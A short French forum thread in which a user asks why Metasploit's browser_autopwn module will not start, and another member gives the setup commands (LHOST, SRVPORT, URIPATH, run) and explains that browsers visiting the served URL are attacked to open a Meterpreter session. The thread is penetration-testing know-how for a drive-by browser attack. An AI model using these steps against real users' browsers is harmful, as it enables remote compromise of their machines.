LE FORUM DU SITE
Wifi, Backtrack, crack WEP et WPA...
Vous n'êtes pas identifié(e).
Bonjour ,
Je m'interesse au module Browser_autopwn ....
Je n'ai pas trouver de tuto sur le sujet
Et comble de l'histoire c'est quand j'ai tous configurer (lhost,lport,uripath)
Tous mais "exploit" ne se lance pas
Si quelqu'un a un tuto et ou la solution à mon problème cela serais GENIAL
Hors Ligne
Il faut taper run et non pas exploit pour le lancer, car c'est un module de type auxiliary. Voici comment il se configure:
use auxiliary/server/browser_autopwn
set LHOST 192.168.1. ton IP
set SRVPORT 80 il va créer un serveur en écoute, ici le port est 80
set URIPATH / tu peux choisir une url ou laisse comme ça
run
Une fois lancer, il va t'indiquer des URLs à utiliser et dés qu'un client se connecte sur un lien (c-à -d un navigateur) Metasploit va tenter les exploits à sa disposition concernant les navigateurs et voir s'il trouve une faille à exploiter (il sait quel type de navigateur se connecte à lui en analysant l'en-tête http, "user-agent" plus exactement) et tu auras ainsi une session Meterpreter, si tout va bien !
Parce que la majeur partie des exploits que comporte Metasploit et en particulier ceux destinés aux navigateurs sont comme les yaourts, ils périment très vite
Dernière modification par Fuji (25-11-2014 08:28:11)
Hors Ligne
Merci beaucoup Fuji ....
Le sujet est donc résolu
Merci encore !
Hors Ligne
Discussion | Réponses | Vues | Dernier message |
---|---|---|---|
metasploit browser_autopwn par moi
|
1 | 8427 | 30-12-2011 06:31:37 par Fuji |